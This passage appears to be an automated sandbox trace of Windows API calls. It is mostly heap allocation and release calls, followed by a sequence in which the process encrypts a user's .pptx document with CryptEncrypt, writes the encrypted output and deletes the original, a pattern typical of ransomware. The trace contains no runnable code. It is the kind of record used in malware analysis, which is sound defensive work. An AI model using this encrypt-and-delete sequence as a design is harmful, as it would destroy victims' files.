hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.962] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0077.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0077.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0077.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0077.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0077.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0077.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0077.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.963] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.964] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0077.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.966] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.966] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.966] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.966] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0077.966] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.967] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.967] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.972] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca9a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.972] CryptEncrypt (in: hKey=0x41ac500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x15a35, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x15a40) returned 1 [0077.972] CharLowerBuffW (in: lpsz="byte[88641]", cchLength=0xb | out: lpsz="byte[88641]") returned 0xb [0077.976] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.976] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cad30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.976] CryptEncrypt (in: hKey=0x41ac500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4930f08*, pdwDataLen=0x144e790*=0x15a35, dwBufLen=0x15a40 | out: pbData=0x4930f08*, pdwDataLen=0x144e790*=0x15a40) returned 1 [0077.977] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.977] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.977] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.979] WriteFile (in: hFile=0x298, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0x15a40, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144f194*=0x15a40, lpOverlapped=0x0) returned 1 [0077.982] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0077.982] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.982] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca658, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0077.983] CryptDestroyKey (hKey=0x41ac500) returned 1 [0077.983] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.983] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.983] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.983] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.983] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0077.983] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0077.986] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.986] FreeLibrary (hLibModule=0x756e0000) returned 1 [0077.986] CloseHandle (hObject=0x258) returned 1 [0077.986] CloseHandle (hObject=0x298) returned 1 [0077.994] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\QjLwz6.pptx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\QjLwz6.pptx", lpFilePart=0x0) returned 0x25 [0077.994] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\QjLwz6.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qjlwz6.pptx")) returned 0x20 [0077.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0077.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0077.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0077.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0077.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0077.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0077.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0077.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0077.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0077.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d70 [0077.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0077.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.995] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\QjLwz6.pptx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92b82780, ftCreationTime.dwHighDateTime=0x1d5d777, ftLastAccessTime.dwLowDateTime=0x5e34c700, ftLastAccessTime.dwHighDateTime=0x1d59cd2, ftLastWriteTime.dwLowDateTime=0x5e34c700, ftLastWriteTime.dwHighDateTime=0x1d59cd2, nFileSizeHigh=0x0, nFileSizeLow=0x15a35, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="QjLwz6.pptx", cAlternateFileName="QJLWZ6~1.PPT")) returned 0x41ac440 [0077.995] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\QjLwz6.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qjlwz6.pptx")) returned 1 [0077.997] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92b82780, ftCreationTime.dwHighDateTime=0x1d5d777, ftLastAccessTime.dwLowDateTime=0x5e34c700, ftLastAccessTime.dwHighDateTime=0x1d59cd2, ftLastWriteTime.dwLowDateTime=0x5e34c700, ftLastWriteTime.dwHighDateTime=0x1d59cd2, nFileSizeHigh=0x0, nFileSizeLow=0x15a35, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="QjLwz6.pptx", cAlternateFileName="QJLWZ6~1.PPT")) returned 0 [0077.998] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0077.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0077.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0077.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0077.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0077.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0077.999] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0077.999] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 